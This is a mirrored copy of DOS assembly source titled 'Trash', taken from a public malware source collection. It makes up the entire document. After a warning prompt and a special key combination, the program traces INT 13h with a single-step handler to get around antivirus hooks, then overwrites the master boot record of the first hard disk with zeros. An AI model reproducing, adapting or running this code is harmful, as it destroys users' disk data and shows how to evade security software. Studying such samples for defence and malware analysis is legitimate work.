mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-19 08:38:52 +00:00
169 lines
3.4 KiB
NASM
169 lines
3.4 KiB
NASM
|
page ,132
|
|||
|
title Trash - smashes the boot record on the first hard disk
|
|||
|
name TRASH
|
|||
|
|
|||
|
.radix 16
|
|||
|
|
|||
|
code segment
|
|||
|
assume cs:code,ds:code
|
|||
|
|
|||
|
org 100
|
|||
|
|
|||
|
CODEX equ 0C000 ; Or use 0300 when tracing DOS
|
|||
|
|
|||
|
CR equ 0Dh
|
|||
|
LF equ 0A
|
|||
|
|
|||
|
start:
|
|||
|
jmp do_it
|
|||
|
|
|||
|
oldint1 dd ?
|
|||
|
newintx dd ?
|
|||
|
oldintx dd ?
|
|||
|
trace db 1
|
|||
|
found db 0
|
|||
|
buffer db 200 dup (0)
|
|||
|
message db CR,LF,'********** W A R N I N G ! ! ! **********',CR,LF,CR,LF
|
|||
|
db 'This program, when run, will zero (DESTROY!) the',CR,LF
|
|||
|
db 'master boot record of your first hard disk.',CR,LF,CR,LF
|
|||
|
db 'The purpose of this is to test the antivirus software,',CR,LF
|
|||
|
db 'so be sure you have installed your favourite',CR,LF
|
|||
|
db 'protecting program before running this one!',CR,LF
|
|||
|
db "(It's almost sure it will fail to protect you anyway!)",CR,LF
|
|||
|
db CR,LF,'Press any key to abort, or',CR,LF
|
|||
|
db 'press Ctrl-Alt-RightShift-F5 to proceed (at your own risk!) $'
|
|||
|
warned db CR,LF,CR,LF,'Allright, you were warned!',CR,LF,'$'
|
|||
|
|
|||
|
do_it:
|
|||
|
mov ax,600 ; Clear the screen by scrolling it up
|
|||
|
mov bh,7
|
|||
|
mov dx,1950
|
|||
|
xor cx,cx
|
|||
|
int 10
|
|||
|
|
|||
|
mov ah,0F ; Get the current video mode
|
|||
|
int 10 ; (the video page, more exactly)
|
|||
|
|
|||
|
mov ah,2 ; Home the cursor
|
|||
|
xor dx,dx
|
|||
|
int 10
|
|||
|
|
|||
|
mov ah,9 ; Print a warning message
|
|||
|
mov dx,offset message
|
|||
|
int 21
|
|||
|
|
|||
|
mov ax,0C08 ; Flush the keyboard and get a char
|
|||
|
int 21
|
|||
|
cmp al,0 ; Extendet ASCII?
|
|||
|
jne quit1 ; Exit if not
|
|||
|
mov ah,8 ; Get the key code
|
|||
|
int 21
|
|||
|
cmp al,6C ; Shift-F5?
|
|||
|
jne quit1 ; Exit if not
|
|||
|
mov ah,2 ; Get keyboard shift status
|
|||
|
int 16
|
|||
|
and al,1101b ; Ctrl-Alt-RightShift?
|
|||
|
jnz proceed ; Proceed if so
|
|||
|
quit1:
|
|||
|
jmp quit ; Otherwise exit
|
|||
|
|
|||
|
proceed:
|
|||
|
mov ah,9 ; Print the last message
|
|||
|
mov dx,offset warned
|
|||
|
int 21
|
|||
|
|
|||
|
mov ax,3501 ; Get interrupt vector 1 (single steping)
|
|||
|
int 21
|
|||
|
mov word ptr oldint1,bx
|
|||
|
mov word ptr oldint1+2,es
|
|||
|
|
|||
|
mov ax,2501 ; Set new INT 1 handler
|
|||
|
mov dx,offset newint1
|
|||
|
int 21
|
|||
|
|
|||
|
mov ax,3513 ; Get interrupt vector 13
|
|||
|
int 21
|
|||
|
mov word ptr oldintx,bx
|
|||
|
mov word ptr oldintx+2,es
|
|||
|
mov word ptr newintx,bx
|
|||
|
mov word ptr newintx+2,es
|
|||
|
|
|||
|
; The following code is sacred in it's present form.
|
|||
|
; To change it would cause volcanos to errupt,
|
|||
|
; the ground to shake, and program not to run!
|
|||
|
|
|||
|
mov ax,200
|
|||
|
push ax
|
|||
|
push cs
|
|||
|
mov ax,offset done
|
|||
|
push ax
|
|||
|
mov ax,100
|
|||
|
push ax
|
|||
|
push cs
|
|||
|
mov ax,offset faddr
|
|||
|
push ax
|
|||
|
mov ah,55
|
|||
|
iret
|
|||
|
|
|||
|
assume ds:nothing
|
|||
|
|
|||
|
faddr:
|
|||
|
jmp oldintx
|
|||
|
|
|||
|
newint1:
|
|||
|
push bp
|
|||
|
mov bp,sp
|
|||
|
cmp trace,0
|
|||
|
jne search
|
|||
|
exit:
|
|||
|
and [bp+6],not 100
|
|||
|
exit1:
|
|||
|
pop bp
|
|||
|
iret
|
|||
|
search:
|
|||
|
cmp [bp+4],CODEX
|
|||
|
jb exit1
|
|||
|
;Or use ja if you want to trace DOS-owned interrupt
|
|||
|
push ax
|
|||
|
mov ax,[bp+4]
|
|||
|
mov word ptr newintx+2,ax
|
|||
|
mov ax,[bp+2]
|
|||
|
mov word ptr newintx,ax
|
|||
|
pop ax
|
|||
|
mov found,1
|
|||
|
mov trace,0
|
|||
|
jmp exit
|
|||
|
|
|||
|
assume ds:code
|
|||
|
done:
|
|||
|
mov trace,0
|
|||
|
push ds
|
|||
|
mov ax,word ptr oldint1+2
|
|||
|
mov dx,word ptr oldint1
|
|||
|
mov ds,ax
|
|||
|
mov ax,2501 ; Restore old INT 1 handler
|
|||
|
int 21
|
|||
|
pop ds
|
|||
|
|
|||
|
; Code beyong this point is not sacred...
|
|||
|
; It may be perverted in any manner by any pervert.
|
|||
|
|
|||
|
cmp found,1 ; See if original INT 13 handler found
|
|||
|
jne quit ; Exit if not
|
|||
|
push ds
|
|||
|
pop es ; Restore ES
|
|||
|
|
|||
|
mov ax,301 ; Write 1 sector
|
|||
|
mov cx,1 ; Cylinder 0, sector 1
|
|||
|
mov dx,80 ; Head 0, drive 80h
|
|||
|
mov bx,offset buffer
|
|||
|
pushf ; Simulate INT 13
|
|||
|
call newintx ; Do it
|
|||
|
|
|||
|
quit:
|
|||
|
mov ax,4C00 ; Exit program
|
|||
|
int 21
|
|||
|
|
|||
|
code ends
|
|||
|
end start
|
|||
|
|